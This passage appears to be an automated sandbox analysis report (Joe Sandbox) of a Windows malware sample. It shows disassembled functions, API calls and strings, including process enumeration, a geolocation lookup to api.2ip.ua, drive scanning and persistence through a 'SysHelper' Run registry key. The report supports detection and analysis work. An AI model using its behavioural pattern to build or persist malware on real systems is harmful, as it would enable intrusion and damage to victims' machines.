                                                                                                                                                                        • API ID: Internet$File$CloseCreateHandle_memset_wcsstr$AppendOpenPathStringUuid$AddressByteCharDirectoryExecuteFreeHttpInfoLibraryLoadMultiPointerProcQueryReadShellWideWrite_memmove_strtokgethostbynamelstrcpylstrlen
                                                                                                                                                                        • String ID: $run$.bit/$Microsoft Internet Explorer$SHGetFolderPathA$Shell32.dll
                                                                                                                                                                        • API String ID: 1843630811-800396732
                                                                                                                                                                        • Opcode ID: c4f6d8012be6e8dad9e3ee461557c078abb87fdfef01c419299b57314359ab44
                                                                                                                                                                        • Instruction ID: 0b1c58cbae60341db35a23c84f06c08a16d876a53fd87583f13f2702625884f2
                                                                                                                                                                        • Opcode Fuzzy Hash: c4f6d8012be6e8dad9e3ee461557c078abb87fdfef01c419299b57314359ab44
                                                                                                                                                                        • Instruction Fuzzy Hash: 30328C7010C3809FEB30DF24C849B9FBBE4AF96708F10495CF5995A292D7B69548CBA3
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA2220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1583 ba2220-ba228a call bbf7c0 GetCommandLineW CommandLineToArgvW PathFindFileNameW LoadLibraryW GetProcAddress * 3 1586 ba228c-ba22ba LoadLibraryW GetProcAddress * 3 1583->1586 1587 ba22bd-ba22d1 K32EnumProcesses 1583->1587 1586->1587 1588 ba22df-ba22ec 1587->1588 1589 ba22d3-ba22de 1587->1589 1590 ba22ee 1588->1590 1591 ba2353-ba235b 1588->1591 1592 ba22f0-ba2308 OpenProcess 1590->1592 1593 ba230a-ba231a K32EnumProcessModules 1592->1593 1594 ba2346-ba2351 CloseHandle 1592->1594 1593->1594 1595 ba231c-ba2339 K32GetModuleBaseNameW call bb0235 1593->1595 1594->1591 1594->1592 1597 ba233e-ba2343 1595->1597 1597->1594 1598 ba2345 1597->1598 1598->1594
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00BA2235
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 00BA2240
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(00000000), ref: 00BA2248
                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00BA2256
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00BA226A
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00BA2275
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00BA2280
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00BA2291
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00BA229F
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00BA22AA
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00BA22B5
                                                                                                                                                                        • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 00BA22CD
                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00BA22FE
                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00BA2315
                                                                                                                                                                        • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 00BA232C
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BA2347
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                                                                        • API String ID: 3668891214-3807497772
                                                                                                                                                                        • Opcode ID: 9e9ec632f06de9b738aeef531f2f24c949c53ee826a388f191054940dd39a5e5
                                                                                                                                                                        • Instruction ID: a1d45fc6c4c0febdd17711efe1fb3018bd7ef492a5e00e474a1ef5a1615f57ee
                                                                                                                                                                        • Opcode Fuzzy Hash: 9e9ec632f06de9b738aeef531f2f24c949c53ee826a388f191054940dd39a5e5
                                                                                                                                                                        • Instruction Fuzzy Hash: 13313F71E00319AFDF10AFA99C89FEEB7F8FF45705F1040AAE904E2150DA749A418BA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BAF130 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 689sleeptimewindowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • timeGetTime.WINMM ref: 00BAF15E
                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 00BAF185
                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 00BAF19D
                                                                                                                                                                        • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 00BAF9D0
                                                                                                                                                                          • Part of subcall function 00BA0A50: GetLogicalDrives.KERNEL32 ref: 00BA0A75
                                                                                                                                                                          • Part of subcall function 00BA0A50: SetErrorMode.KERNEL32(00000001,00C90234,00000002), ref: 00BA0AE2
                                                                                                                                                                          • Part of subcall function 00BA0A50: PathFileExistsA.SHLWAPI(?), ref: 00BA0AF9
                                                                                                                                                                          • Part of subcall function 00BA0A50: SetErrorMode.KERNEL32(00000000), ref: 00BA0B02
                                                                                                                                                                          • Part of subcall function 00BA0A50: GetDriveTypeA.KERNEL32(?), ref: 00BA0B1B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                                                                                                                                                                        • String ID: C:\
                                                                                                                                                                        • API String ID: 3672571082-3404278061
                                                                                                                                                                        • Opcode ID: ac0f91d27fcf3c7e2e46c4aeb79f484c7f6016962d7f7bf8e1ac3553e3547090
                                                                                                                                                                        • Instruction ID: 7e6b594b6ece7ac19d8a14d62a6d0b342751d920a04c24dd803d8509bf5b6631
                                                                                                                                                                        • Opcode Fuzzy Hash: ac0f91d27fcf3c7e2e46c4aeb79f484c7f6016962d7f7bf8e1ac3553e3547090
                                                                                                                                                                        • Instruction Fuzzy Hash: A842AD75D043069BDF24DFA8C885BEEBBF1BF45308F1441A9E805AB381D7B5AA05CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9CF10 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 228networkfileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2199 b9cf10-b9cfb0 call bbf7c0 call bbb420 InternetOpenW call ba5c10 InternetOpenUrlW 2206 b9cfb9-b9cffb InternetReadFile InternetCloseHandle * 2 call ba56d0 2199->2206 2207 b9cfb2-b9cfb4 2199->2207 2212 b9d000-b9d01d 2206->2212 2208 b9d213-b9d217 2207->2208 2210 b9d219-b9d221 call bb2587 2208->2210 2211 b9d224-b9d236 2208->2211 2210->2211 2214 b9d01f-b9d021 2212->2214 2215 b9d023-b9d02c 2212->2215 2218 b9d039-b9d069 call ba56d0 call ba4300 2214->2218 2216 b9d030-b9d035 2215->2216 2216->2216 2219 b9d037 2216->2219 2224 b9d1cb 2218->2224 2225 b9d06f-b9d08b call ba3010 2218->2225 2219->2218 2227 b9d1cd-b9d1d1 2224->2227 2233 b9d0b9-b9d0bd 2225->2233 2234 b9d08d-b9d091 2225->2234 2229 b9d1de-b9d1f4 2227->2229 2230 b9d1d3-b9d1db call bb2587 2227->2230 2231 b9d201-b9d20f 2229->2231 2232 b9d1f6-b9d1fe call bb2587 2229->2232 2230->2229 2231->2208 2232->2231 2237 b9d0cd-b9d0e1 call ba4300 2233->2237 2238 b9d0bf-b9d0ca call bb2587 2233->2238 2240 b9d09e-b9d0b4 call ba3d40 2234->2240 2241 b9d093-b9d09b call bb2587 2234->2241 2237->2224 2250 b9d0e7-b9d149 call ba3010 2237->2250 2238->2237 2240->2233 2241->2240 2253 b9d150-b9d15a 2250->2253 2254 b9d15c-b9d15e 2253->2254 2255 b9d160-b9d162 2253->2255 2256 b9d16e-b9d18b call b9b650 2254->2256 2257 b9d165-b9d16a 2255->2257 2261 b9d19a-b9d19e 2256->2261 2262 b9d18d-b9d18f 2256->2262 2257->2257 2259 b9d16c 2257->2259 2259->2256 2261->2253 2264 b9d1a0 2261->2264 2262->2261 2263 b9d191-b9d198 2262->2263 2263->2261 2265 b9d1c7-b9d1c9 2263->2265 2266 b9d1a2-b9d1a6 2264->2266 2265->2266 2267 b9d1a8-b9d1b0 call bb2587 2266->2267 2268 b9d1b3-b9d1c5 2266->2268 2267->2268 2268->2227
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9CF4A
                                                                                                                                                                        • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00B9CF5F
                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00B9CFA6
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 00B9CFCD
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00B9CFDA
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00B9CFDD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                                                                        • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                                                                        • API String ID: 1485416377-933853286
                                                                                                                                                                        • Opcode ID: ba2daf5dd8f270bc522c83e7b24723de66fc098c0532afadc059025b54515924
                                                                                                                                                                        • Instruction ID: 8c3f939554028bdcb460ee0cc2b19c665ca51b2f442570f95020cadd565d385e
                                                                                                                                                                        • Opcode Fuzzy Hash: ba2daf5dd8f270bc522c83e7b24723de66fc098c0532afadc059025b54515924
                                                                                                                                                                        • Instruction Fuzzy Hash: E2919E71D002589FEF20CFA4CD49BEEBBF4AF15704F2041A8E4057B291D7B65A88CB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BABAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2271 babae0-babb0d 2272 babb13 2271->2272 2273 babba0-babba7 2271->2273 2276 babb54-babb5e 2272->2276 2277 babb15-babb1a 2272->2277 2274 babf3d-babf47 2273->2274 2275 babbad-babbae 2273->2275 2284 babf49 2274->2284 2285 babf5c-babf63 2274->2285 2280 babbb0-babbd4 DefWindowProcW 2275->2280 2281 babbd7-babc45 call bb0c62 GetComputerNameW call ba3100 call bace80 2275->2281 2278 babf81-babf97 2276->2278 2279 babb64-babb68 2276->2279 2282 babb1c-babb1f 2277->2282 2283 babb47-babb4f PostQuitMessage 2277->2283 2286 babb6a-babb6e 2279->2286 2287 babb75-babb9d DefWindowProcW 2279->2287 2305 babc7b-babc80 2281->2305 2306 babc47-babc4c 2281->2306 2282->2278 2291 babb25-babb28 2282->2291 2283->2278 2292 babf50-babf54 2284->2292 2288 babf9a-babfc2 DefWindowProcW 2285->2288 2289 babf65-babf71 IsWindow 2285->2289 2286->2279 2294 babb70 2286->2294 2289->2278 2295 babf73-babf7b DestroyWindow 2289->2295 2291->2280 2297 babb2e-babb31 2291->2297 2292->2288 2293 babf56-babf5a 2292->2293 2293->2285 2293->2292 2294->2278 2295->2278 2297->2278 2299 babb37-babb42 call ba1cd0 2297->2299 2299->2289 2309 babc8e-babcb1 2305->2309 2310 babc82-babc8b call bb2587 2305->2310 2307 babc5a-babc76 call ba45a0 2306->2307 2308 babc4e-babc57 call bb2587 2306->2308 2307->2305 2308->2307 2314 babcbf-babcf1 call bb0bed 2309->2314 2315 babcb3-babcbc call bb2587 2309->2315 2310->2309 2322 babefb-babf0f IsWindow 2314->2322 2323 babcf7-babcfa 2314->2323 2315->2314 2325 babf28-babf2d 2322->2325 2326 babf11-babf18 2322->2326 2324 babd00-babd04 2323->2324 2327 babd0a-babd0e 2324->2327 2328 babee5-babef1 2324->2328 2325->2278 2330 babf2f-babf3b call bb2587 2325->2330 2326->2325 2329 babf1a-babf22 DestroyWindow 2326->2329 2327->2328 2331 babd14-babd7b call ba4690 * 2 call b9eff0 2327->2331 2328->2324 2332 babef7-babef9 2328->2332 2329->2325 2330->2278 2341 babee1 2331->2341 2342 babd81-babe44 call bac330 call ba9d10 call bac240 call bab680 call bab8b0 call ba4690 call bace80 call ba31d0 2331->2342 2332->2322 2332->2325 2341->2328 2359 babe46-babe52 call bb2587 2342->2359 2360 babe55-babe81 2342->2360 2359->2360 2362 babe8f-babedf CreateThread 2360->2362 2363 babe83-babe8c call bb2587 2360->2363 2362->2328 2363->2362
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00BABB49
                                                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00BABBBA
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BABBE4
                                                                                                                                                                        • GetComputerNameW.KERNEL32(00000000,?), ref: 00BABBF4
                                                                                                                                                                        • _free.LIBCMT ref: 00BABCD7
                                                                                                                                                                          • Part of subcall function 00BA1CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00C5AC68,000000FF), ref: 00BA1D12
                                                                                                                                                                          • Part of subcall function 00BA1CD0: _memset.LIBCMT ref: 00BA1D3B
                                                                                                                                                                          • Part of subcall function 00BA1CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00BA1D63
                                                                                                                                                                          • Part of subcall function 00BA1CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C5AC68,000000FF), ref: 00BA1D6C
                                                                                                                                                                          • Part of subcall function 00BA1CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00BA1DD6
                                                                                                                                                                          • Part of subcall function 00BA1CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00BA1E48
                                                                                                                                                                        • IsWindow.USER32(?), ref: 00BABF69
                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00BABF7B
                                                                                                                                                                        • DefWindowProcW.USER32(?,00008003,?,?), ref: 00BABFA8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3873257347-0
                                                                                                                                                                        • Opcode ID: bc05bd004bf84667f72e8ca3da8010f41ec91a5b0820723a18cd34f508a514cc
                                                                                                                                                                        • Instruction ID: bb56e5a441537d8d801f308c69661b8fa493555c606e65308cf7c1279daf3bca
                                                                                                                                                                        • Opcode Fuzzy Hash: bc05bd004bf84667f72e8ca3da8010f41ec91a5b0820723a18cd34f508a514cc
                                                                                                                                                                        • Instruction Fuzzy Hash: 13C1BE7150C3809FDB20DF28D845BAABBE4FF86314F144A6DF498972A2D7769844CB92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB3576 Relevance: 15.3, APIs: 10, Instructions: 258COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2517 bb3576-bb358f 2518 bb35a9-bb35be call bbb420 2517->2518 2519 bb3591-bb359b call bb5208 call bb42d2 2517->2519 2518->2519 2524 bb35c0-bb35c3 2518->2524 2528 bb35a0 2519->2528 2526 bb35d7-bb35dd 2524->2526 2527 bb35c5 2524->2527 2531 bb35e9 call bbfb64 2526->2531 2532 bb35df 2526->2532 2529 bb35cb-bb35d5 call bb5208 2527->2529 2530 bb35c7-bb35c9 2527->2530 2533 bb35a2-bb35a8 2528->2533 2529->2528 2530->2526 2530->2529 2538 bb35ee-bb35fa call bbf803 2531->2538 2532->2529 2535 bb35e1-bb35e7 2532->2535 2535->2529 2535->2531 2541 bb3600-bb360c call bbf82d 2538->2541 2542 bb37e5-bb37ef call bb42fd 2538->2542 2541->2542 2547 bb3612-bb361e call bbf857 2541->2547 2547->2542 2550 bb3624-bb362b 2547->2550 2551 bb369b-bb36a6 call bbf939 2550->2551 2552 bb362d 2550->2552 2551->2533 2558 bb36ac-bb36af 2551->2558 2554 bb362f-bb3635 2552->2554 2555 bb3637-bb3653 call bbf939 2552->2555 2554->2551 2554->2555 2555->2533 2562 bb3659-bb365c 2555->2562 2560 bb36de-bb36eb 2558->2560 2561 bb36b1-bb36ba call bbfbb4 2558->2561 2564 bb36ed-bb36fc call bc05a0 2560->2564 2561->2560 2570 bb36bc-bb36dc 2561->2570 2565 bb379e-bb37a0 2562->2565 2566 bb3662-bb366b call bbfbb4 2562->2566 2573 bb3709-bb3730 call bc04f0 call bc05a0 2564->2573 2574 bb36fe-bb3706 2564->2574 2565->2533 2566->2565 2575 bb3671-bb3689 call bbf939 2566->2575 2570->2564 2583 bb373e-bb3765 call bc04f0 call bc05a0 2573->2583 2584 bb3732-bb373b 2573->2584 2574->2573 2575->2533 2580 bb368f-bb3696 2575->2580 2580->2565 2589 bb3773-bb3782 call bc04f0 2583->2589 2590 bb3767-bb3770 2583->2590 2584->2583 2593 bb37af-bb37c8 2589->2593 2594 bb3784 2589->2594 2590->2589 2597 bb379b 2593->2597 2598 bb37ca-bb37e3 2593->2598 2595 bb378a-bb3798 2594->2595 2596 bb3786-bb3788 2594->2596 2595->2597 2596->2595 2599 bb37a5-bb37a7 2596->2599 2597->2565 2598->2565 2599->2565 2600 bb37a9 2599->2600 2600->2593 2601 bb37ab-bb37ad 2600->2601 2601->2565 2601->2593
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00BB35B1
                                                                                                                                                                          • Part of subcall function 00BB5208: __getptd_noexit.LIBCMT ref: 00BB5208
                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00BB364A
                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00BB3680
                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00BB369D
                                                                                                                                                                        • __allrem.LIBCMT ref: 00BB36F3
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BB370F
                                                                                                                                                                        • __allrem.LIBCMT ref: 00BB3726
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BB3744
                                                                                                                                                                        • __allrem.LIBCMT ref: 00BB375B
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BB3779
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1503770280-0
                                                                                                                                                                        • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                        • Instruction ID: 28060a13275d1e9354f3e82df437614ccc85bc7fd4cfd4f32046b7a6c076b34e
                                                                                                                                                                        • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                        • Instruction Fuzzy Hash: BD7196B1A00716ABD7249E79CC81FFAB3E8EF54724F1442BAF514D6681EBB0DE408790
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BB0FDD: __wfsopen.LIBCMT ref: 00BB0FE8
                                                                                                                                                                        • _fgetws.LIBCMT ref: 00B9C7BC
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9C89F
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 00B9C94B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
